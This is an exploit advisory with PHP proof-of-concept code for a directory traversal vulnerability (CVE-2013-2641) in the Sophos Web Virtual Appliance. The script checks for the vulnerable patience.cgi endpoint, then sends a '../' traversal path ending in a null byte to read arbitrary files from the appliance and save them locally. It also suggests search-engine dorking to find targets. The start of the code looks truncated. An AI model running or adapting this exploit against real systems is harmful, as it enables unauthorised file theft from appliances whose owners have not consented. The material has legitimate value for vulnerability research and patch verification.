============================================================================================================================================= | # Title : Sophos Web Virtual Appliance v3.7.0 Directory Traversal Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) | | # Vendor : https://www.sophos.com/en-us/support/downloads/virtual-web-appliance | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] Code Description: This code allows you to exploit the Traversal Directory vulnerability in the Sophos Web Protection Appliance to retrieve any file from the system. cURL was used to execute HTTP requests, and the response was handled to verify the success of the attack and save the retrieved content to a local file. (Related : https://packetstorm.news/files/id/180832/ Linked CVE numbers: CVE-2013-2641 ) . [+] save code as poc.php. [+] Set target : line 84 [+] PayLoad : target = $target; $this->port = $port; $this->filepath = $filepath; $this->depth = $depth; } private function my_basename($filename) { return basename(str_replace('\\', '/', $filename)); } private function is_proficy() { $url = "https://{$this->target}:{$this->port}/cgi-bin/patience.cgi"; $response = $this->send_request($url); if ($response && strpos($response['body'], 'The patience page request was not valid') !== false) { return true; } return false; } private function read_file() { $traversal_path = str_repeat('../', $this->depth) . $this->filepath . "%00"; echo "Retrieving file contents...\n"; $url = "https://{$this->target}:{$this->port}/cgi-bin/patience.cgi?id=" . urlencode($traversal_path); $response = $this->send_request($url); if ($response && ($response['code'] == 200 || $response['code'] == 500) && isset($response['headers']['X-Sophos-PatienceID'])) { return $response['body']; } else { echo "Error: " . $response['code'] . "\n" . $response['body'] . "\n"; return null; } } private function send_request($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); $body = curl_exec($ch); $code = curl_getinfo($ch, CURLINFO_HTTP_CODE); $headers = curl_getinfo($ch); curl_close($ch); return ['code' => $code, 'body' => $body, 'headers' => $headers]; } public function run() { echo "Checking if it's a Sophos Web Protect Appliance with the vulnerable component...\n"; if ($this->is_proficy()) { echo "Check successful\n"; } else { echo "Sophos Web Protect Appliance vulnerable component not found\n"; return; } $contents = $this->read_file(); if ($contents === null) { echo "File not downloaded\n"; return; } $file_name = $this->my_basename($this->filepath); file_put_contents($file_name, $contents); echo "File saved as: " . $file_name . "\n"; } } $exploit = new SophosTraversalExploit('target.com'); $exploit->run(); Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================